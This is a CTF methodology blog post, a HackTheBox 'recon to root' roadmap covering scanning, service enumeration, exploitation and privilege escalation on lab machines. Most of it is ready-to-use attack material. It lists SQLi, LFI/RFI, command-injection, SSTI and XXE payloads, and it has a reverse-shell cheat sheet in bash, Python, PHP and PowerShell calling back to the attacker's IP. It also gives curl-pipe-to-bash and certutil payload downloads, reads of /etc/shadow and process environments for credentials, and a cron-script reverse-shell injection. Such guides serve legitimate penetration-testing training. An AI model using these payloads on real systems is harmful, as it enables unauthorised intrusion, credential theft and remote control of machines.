General Writeups & Problem Solving

HackTheBox RoadMap: Recon to Root in 7 Phases

AUTHORCyberAlp0
READ TIME05 MIN
HackTheBox RoadMap: Recon to Root in 7 Phases

A structured methodology to follow when solving any HackTheBox machine.

This road map can be divided into 7 core stages:

  • Phase 1: Reconnaissance (Port Scanning)
  • Phase 2: Service Enumeration
  • Phase 3: Vulnerability Identification
  • Phase 4: Exploitation / Initial Access
  • Phase 5: Post-Exploitation / Local Enumeration (Linux / Windows)
  • Phase 6: Privilege Escalation (Linux / Windows)
  • Phase 7: Capture the Flags

Plus a Quick Reference: Common Tools table and a set of Golden Rules at the end.

Phase 1: Reconnaissance (Port Scanning)

The goal is to discover what services are running on the target. You can use automated tools like NmapAutomator, the ordinary Nmap tool, or Rustscan to perform the scanning.

Firstly: Initial Fast Scan (Nmap)

nmap -sC -sV -vv -oN initial.txt <target_ip>
  • -sC runs default scripts.
  • -sV detects service versions.
  • -oN saves output to a file.
  • -vv (very verbose) increases the output detail level so Nmap shows results in real-time as it discovers them, instead of waiting until the full scan completes.
  • -sA is an ACK scan. It sends TCP packets with only the ACK flag set to the target ports. It doesn't tell you if a port is open or closed — instead, it tells you whether a firewall is filtering the port or not.

Secondly: Full Port Scan

Scans all 65535 ports. Run this in the background while you work on the results from the initial scan.

nmap -p- -T4 -oN allports.txt <target_ip>

Thirdly: UDP Scan (often overlooked)

nmap -sU --top-ports 50 -oN udp.txt <target_ip>

What to Note

  • Open ports and service versions
  • Operating system hints
  • Any script output (e.g., anonymous FTP, SMB shares, HTTP titles)

Phase 2: Service Enumeration

Spend the most time here. Enumerate every open service.

Firstly: HTTP/HTTPS (Port 80/443)

Add the host name to /etc/hosts:

echo "<target_ip> <hostname>.htb" | sudo tee -a /etc/hosts

Secondly: Manual checks

  • View the website in the browser
  • Read the page source (Ctrl+U) for comments and hidden fields
  • Check /robots.txt and /sitemap.xml
  • Identify the tech stack from headers, extensions, and cookies
  • Look for login forms, search bars, and file upload features

Thirdly: Directory brute-forcing using gobuster

gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Fourthly: Directory brute-forcing using ffuf

ffuf -u http://target/FUZZ -w /usr/share/wordlists/dirb/common.txt

Fifthly: Subdomain enumeration

gobuster vhost -u http://target.htb -w /usr/share/wordlists/subdomains-top1million-5000.txt
ffuf -u http://target.htb -H "Host: FUZZ.target.htb" -w /usr/share/wordlists/subdomains-top1million-5000.txt

Sixth: Vulnerability scanner

nikto -h http://target

Seventhly: Enumerating Common Services

1 — FTP (Port 21)

ftp <target_ip>
# Try anonymous login: anonymous / anonymous
# If logged in:
ls -la
get <filename>

2 — SSH (Port 22)

  • Don't brute-force unless you have a username
  • Come back when you find credentials
  • Check for outdated versions with known CVEs

3 — SMB (Port 139/445)

smbclient -L //<target_ip> -N
smbmap -H <target_ip>
enum4linux -a <target_ip>
crackmapexec smb <target_ip> --shares

4 — DNS (Port 53)

dig axfr <hostname>.htb @<target_ip>
dig any <hostname>.htb @<target_ip>

5 — SNMP (UDP Port 161)

snmpwalk -v2c -c public <target_ip>

6 — MySQL (Port 3306)

mysql -h <target_ip> -u root -p

7 — Redis (Port 6379)

redis-cli -h <target_ip>
info
keys *

8 — WinRM (Port 5985)

evil-winrm -i <target_ip> -u <username> -p <password>

Phase 3: Vulnerability Identification

Based on what you found, look for attack vectors. Check for known exploits using searchsploit.

searchsploit <service_name> <version>
searchsploit <CMS_name>

Common Web Vulnerabilities to Test

1 — SQL Injection

' OR 1=1 --
' OR '1'='1
admin' --

2 — Local File Inclusion (LFI)

http://target/page?file=../../../../etc/passwd
http://target/page?file=php://filter/convert.base64-encode/resource=index.php

3 — Remote File Inclusion (RFI)

http://target/page?file=http://your_ip/shell.php

4 — Command Injection

; whoami
| id
$(whoami)
`id`

5 — Server-Side Template Injection (SSTI)

{{7*7}}
${7*7}

6 — XML External Entity (XXE)

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

7 — Type Juggling (PHP)

parameter[]=    # sends an array instead of a string

8- Check for Misconfigurations

  1. Exposed config files (.env, config.php, web.config)
  2. Swap files (.swp, .bak)
  3. Directory listing enabled
  4. Default credentials
  5. Backup files (file.php.bak, file.php.old)
  6. Account takeover — See if there is a sign-in page. Try the possible usernames you may have found (e.g., ben@silentium.htb) through the reset-password page. If the account exists, a message will state that the reset link was sent to the email. When you press the reset link, intercept the traffic with Burp Suite and inspect the request and response. You may see that the temporary token is captured within the response. The key vulnerability here is that the API returns the reset token directly in the response instead of only sending it to the user's email — so you don't need access to the target's inbox to take over the account.
  7. Node.js misconfigurations — This can exist in many AI-based platforms like Flowise (an open-source, no-code/low-code platform for building AI agents and chatbots visually). If the platform has a CustomMCP node that lets users define server configurations in JSON, and that config tells the server what command to execute, an attacker can inject a reverse-shell command instead of a legitimate server config — that's the basis of CVE-2025-59528.

Phase 4: Exploitation / Initial Access

Reverse Shell Cheat Sheet

1- Start the listener:

nc -lvnp 4444

2- Bash:

bash -i >& /dev/tcp/<your_ip>/4444 0>&1

3- Python:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

4- PHP:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'"); ?>

5- PowerShell (Windows):

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<your_ip>",4444);...

6- Shell Stabilisation (Linux)

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash
stty rows 40 columns 160
Troubleshooting note: If shell stabilisation with python3 -c 'import pty; pty.spawn("/bin/bash")' fails because bash doesn't exist in the container, use /bin/sh instead.

Phase 5: Post-Exploitation / Local Enumeration

First: Linux Systems

1- Grab the User Flag

find / -name "user.txt" 2>/dev/null

2- System Information

whoami
id
hostname
uname -a
cat /etc/os-release

3- Users and Credentials

cat /etc/passwd | grep -v nologin | grep -v false
cat /etc/shadow 2>/dev/null
cat /etc/group
ls -la /home/

4- Sudo Permissions

sudo -l

5- SUID Binaries

find / -perm -4000 -type f 2>/dev/null

6- Cron Jobs

cat /etc/crontab
ls -la /etc/cron.*
crontab -l

7- Writable Files and Directories

find / -writable -type f 2>/dev/null | grep -v proc
find / -writable -type d 2>/dev/null

8- Config Files and Credentials

grep -rn "password\|passwd\|pass\|credentials\|db_" /var/www/ 2>/dev/null
cat /var/www/html/config.php 2>/dev/null
cat /var/www/html/.env 2>/dev/null
find / -name "*.conf" -o -name "*.config" -o -name "*.ini" 2>/dev/null

9- Network Information

ifconfig
netstat -tulnp
ss -tulnp

10- Running Processes

ps aux

11- Command History

history
cat ~/.bash_history

12- Capabilities

getcap -r / 2>/dev/null

13- Automated Enumeration

# On attacker — host the script
python3 -m http.server 8000

# On target — download and run
curl http://<your_ip>:8000/linpeas.sh | bash
# or
wget http://<your_ip>:8000/linpeas.sh -O /tmp/linpeas.sh && bash /tmp/linpeas.sh

Secondly: Docker Machines

You might not get access to the host machine — you might land in a container instead.

Evidence you're inside a Docker container:

  • The hostname is a random container ID (readable hostnames usually mean a real machine; random hex strings mean Docker container IDs).
  • You can't find user.txt or root.txt, there are no sudo commands, and no flags in expected locations.
  • A .dockerenv file is present:
ls -la /.dockerenv
  • It's referenced in the cgroup listing:
cat /proc/1/cgroup

The flags are on the host machine, not inside this container. You need to escape this step and get a real SSH session to the host. To get saved credentials from the container's environment:

cat /proc/1/environ | tr '\0' '\n'

Thirdly: Windows Systems

1- System Information

whoami /all
systeminfo
net user
net localgroup administrators

2- Search for Credentials

findstr /si password *.txt *.ini *.config *.xml
reg query HKLM /f password /t REG_SZ /s

3- Check Privileges

whoami /priv

4- Automated Enumeration

:: WinPEAS
certutil -urlcache -f http://<your_ip>:8000/winpeas.exe winpeas.exe
.\winpeas.exe

Phase 6: Privilege Escalation

Firstly: Linux Systems

sudo -l Abuse — If you can run a command as root, check GTFOBins: https://gtfobins.github.io/

SUID Abuse — If a binary has SUID set, check GTFOBins for exploitation.

Cron Job Abuse — If a cron job runs a writable script as root, inject your payload:

echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' >> /path/to/writable/script.sh

1- Kernel Exploits (Last Resort)

uname -r
# Search for kernel version exploits
searchsploit linux kernel <version>

2- Password Reuse — Always try found passwords for other users and services:

su <username>
ssh <username>@target

3- Group-Based Escalation

  • lxd / docker group → container escape to root
  • disk group → read any file on disk
  • adm group → read log files for credentials

4- Local host running services / Port Forwarding (SSH tunnelling from the target to the attacker):

netstat -tulpn | grep 127.0.0.1
ssh -L 3001:127.0.0.1:3001 <username>@<TARGET_IP>

Secondly: Windows Systems

1- Token Privileges

  • SeImpersonatePrivilege → Potato attacks (JuicyPotato, PrintSpoofer)
  • SeBackupPrivilege → copy SAM/SYSTEM hives

2- Service Misconfigurations

sc query state= all
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

3- Unquoted Service Paths

wmic service get name,pathname,displayname,startmode

4- AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Phase 7: Capture the Root Flag

# Linux
cat /root/root.txt
:: Windows
type C:\Users\Administrator\Desktop\root.txt

Quick Reference: Common Tools

PurposeTools
Port Scanningnmap, masscan, rustscan
Directory Brute-forcinggobuster, ffuf, feroxbuster, dirb
Web Scanningnikto, whatweb, wappalyzer
Exploit Searchsearchsploit, Google, CVE databases
Password Crackingjohn, hashcat, hydra
File Transferpython http.server, wget, curl, certutil
Linux EnumerationLinPEAS, LinEnum, linux-exploit-suggester
Windows EnumerationWinPEAS, PowerUp, Seatbelt, SharpHound
Privilege Escalation ReferenceGTFOBins (Linux), LOLBAS (Windows)

By CyberAlp0 - CyberSkii - Knowledge That Protects

[ #HackTheBox ][ #oscp ][ #ctf ][ #infosec ][ #Cybersecurity ][ #redteam ][ #PrivilegeEscalation ][ #Enumeration ][ #Reconnaissance ][ #BugBounty ][ #OffensiveSecurity ][ #EthicalHacking ][ #cyberskii ][ #cyberalp0 ]